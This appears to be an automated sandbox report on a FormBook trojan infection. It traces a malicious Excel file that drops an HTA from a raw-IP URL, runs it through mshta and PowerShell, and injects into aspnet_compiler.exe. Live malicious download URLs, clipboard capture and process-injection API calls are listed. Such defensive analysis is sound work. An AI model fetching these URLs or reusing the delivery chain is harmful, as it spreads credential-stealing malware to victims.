http://104.168.7.7/356/ce/IEnetbookupdateion.hta
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.hta...Sm
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.htac
Source: mshta.exe, 00000004.00000003.487358638.0000000002F65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.htahttp://104.168.7.7/356/ce/IEnetbookupdateion.htaP
Source: mshta.exe, 00000004.00000003.486739919.00000000036FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.htase
Source: mshta.exe, 00000004.00000003.486739919.00000000036FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.htattingsk
Source: mshta.exe, 00000004.00000003.487027748.0000000000321000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.htawwC:
Source: mshta.exe, 00000004.00000003.486308977.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487744371.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487027748.0000000000366000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.htaxo
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C270000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520144813.000000001A772000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000007.00000002.520144813.000000001A7A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.cr
Source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000007.00000002.519824388.00000000124E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000007.00000002.517798504.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000007.00000002.519824388.00000000124E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.519824388.00000000124E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.519824388.00000000124E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000007.00000002.519824388.00000000124E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486308977.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487744371.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487027748.0000000000366000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://og1.in/
Source: mshta.exe, 00000004.00000002.487716458.00000000002EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487744371.000000000034B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://og1.in/Ts9zje
Source: mshta.exe, 00000004.00000002.487716458.00000000002EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://og1.in/Ts9zje#
Source: mshta.exe, 00000004.00000003.486739919.00000000036FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://og1.in/Ts9zje.htalicy
Source: mshta.exe, 00000004.00000002.487716458.00000000002EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://og1.in/Ts9zjeI5
Source: mshta.exe, 00000004.00000003.486308977.0000000000321000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://og1.in/Ts9zjeS
Source: mshta.exe, 00000004.00000002.487716458.00000000002EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://og1.in/Ts9zjet5
Source: mshta.exe, 00000004.00000003.486308977.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487744371.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487027748.0000000000366000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://og1.in/X
Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C270000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443

Source: unknown	HTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49167 version: TLS 1.2

Creates a window with clipboard capturing capabilities

Source: C:\Windows\System32\mshta.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536316311.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.536316311.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Excel sheet contains many unusual embedded objects

Source: PI#0034250924.xla.xlsx	OLE: Microsoft Excel 2007+
Source: F7A30000.0.dr	OLE: Microsoft Excel 2007+

Microsoft Office drops suspicious files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetbookupdateion[1].hta

Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\ProgID			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID			Jump to behavior

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Memory allocated: 770B0000 page execute and read and write

Jump to behavior

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_0042BDA3 NtClose,	13_2_0042BDA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A607AC NtCreateMutant,LdrInitializeThunk,	13_2_00A607AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5F9F0 NtClose,LdrInitializeThunk,	13_2_00A5F9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FAE8 NtQueryInformationProcess,LdrInitializeThunk,	13_2_00A5FAE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FB68 NtFreeVirtualMemory,LdrInitializeThunk,	13_2_00A5FB68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FDC0 NtQuerySystemInformation,LdrInitializeThunk,	13_2_00A5FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A600C4 NtCreateFile,	13_2_00A600C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A60060 NtQuerySection,	13_2_00A60060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A60078 NtResumeThread,	13_2_00A60078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A60048 NtProtectVirtualMemory,	13_2_00A60048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A601D4 NtSetValueKey,	13_2_00A601D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A6010C NtOpenDirectoryObject,	13_2_00A6010C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A60C40 NtGetContextThread,	13_2_00A60C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A610D0 NtOpenProcessToken,	13_2_00A610D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A61148 NtOpenThread,	13_2_00A61148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5F8CC NtWaitForSingleObject,	13_2_00A5F8CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A61930 NtSetContextThread,	13_2_00A61930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5F938 NtWriteFile,	13_2_00A5F938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5F900 NtReadFile,	13_2_00A5F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FAB8 NtQueryValueKey,	13_2_00A5FAB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FAD0 NtAllocateVirtualMemory,	13_2_00A5FAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FA20 NtQueryInformationFile,	13_2_00A5FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FA50 NtEnumerateValueKey,	13_2_00A5FA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FBB8 NtQueryInformationToken,	13_2_00A5FBB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FBE8 NtQueryVirtualMemory,	13_2_00A5FBE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FB50 NtCreateKey,	13_2_00A5FB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FC90 NtUnmapViewOfSection,	13_2_00A5FC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FC30 NtOpenProcess,	13_2_00A5FC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FC60 NtMapViewOfSection,	13_2_00A5FC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FC48 NtSetInformationFile,	13_2_00A5FC48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A61D80 NtSuspendThread,	13_2_00A61D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FD8C NtDelayExecution,	13_2_00A5FD8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FD5C NtEnumerateKey,	13_2_00A5FD5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FEA0 NtReadVirtualMemory,	13_2_00A5FEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FED0 NtAdjustPrivilegesToken,	13_2_00A5FED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FE24 NtWriteVirtualMemory,	13_2_00A5FE24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FFB4 NtCreateSection,	13_2_00A5FFB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FFFC NtCreateProcessEx,	13_2_00A5FFFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A5FF34 NtQueueApcThread,	13_2_00A5FF34

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_000007FE89A9352E	7_2_000007FE89A9352E
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Code function: 12_2_000007FE8B6574B1	12_2_000007FE8B6574B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00401000	13_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_0040F803	13_2_0040F803
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004160B3	13_2_004160B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00401260	13_2_00401260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_0040FA23	13_2_0040FA23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00402ADD	13_2_00402ADD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00402AE0	13_2_00402AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_0040DAA3	13_2_0040DAA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00402340	13_2_00402340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_0042E333	13_2_0042E333
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00402334	13_2_00402334
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00402E70	13_2_00402E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_0040F7FA	13_2_0040F7FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A6E0C6	13_2_00A6E0C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A6E2E9	13_2_00A6E2E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00B163BF	13_2_00B163BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A963DB	13_2_00A963DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A72305	13_2_00A72305
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00ABA37B	13_2_00ABA37B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AF443E	13_2_00AF443E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AF05E3	13_2_00AF05E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A8C5F0	13_2_00A8C5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AB6540	13_2_00AB6540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A74680	13_2_00A74680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A7E6C1	13_2_00A7E6C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00B12622	13_2_00B12622
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00ABA634	13_2_00ABA634
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A7C7BC	13_2_00A7C7BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A9286D	13_2_00A9286D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A7C85C	13_2_00A7C85C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A729B2	13_2_00A729B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00B1098E	13_2_00B1098E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00B049F5	13_2_00B049F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A869FE	13_2_00A869FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00ABC920	13_2_00ABC920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00B1CBA4	13_2_00B1CBA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AF6BCB	13_2_00AF6BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00B12C9C	13_2_00B12C9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AFAC5E	13_2_00AFAC5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AA0D3B	13_2_00AA0D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A7CD5B	13_2_00A7CD5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AA2E2F	13_2_00AA2E2F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A8EE4C	13_2_00A8EE4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00B0CFB1	13_2_00B0CFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AE2FDC	13_2_00AE2FDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A80F3F	13_2_00A80F3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A9D005	13_2_00A9D005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AED06D	13_2_00AED06D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A73040	13_2_00A73040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A8905A	13_2_00A8905A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AFD13F	13_2_00AFD13F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00B11238	13_2_00B11238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A6F3CF	13_2_00A6F3CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A77353	13_2_00A77353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A81489	13_2_00A81489
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AA5485	13_2_00AA5485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AAD47D	13_2_00AAD47D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00B135DA	13_2_00B135DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A7351F	13_2_00A7351F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AF579A	13_2_00AF579A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AA57C3	13_2_00AA57C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00B0771D	13_2_00B0771D
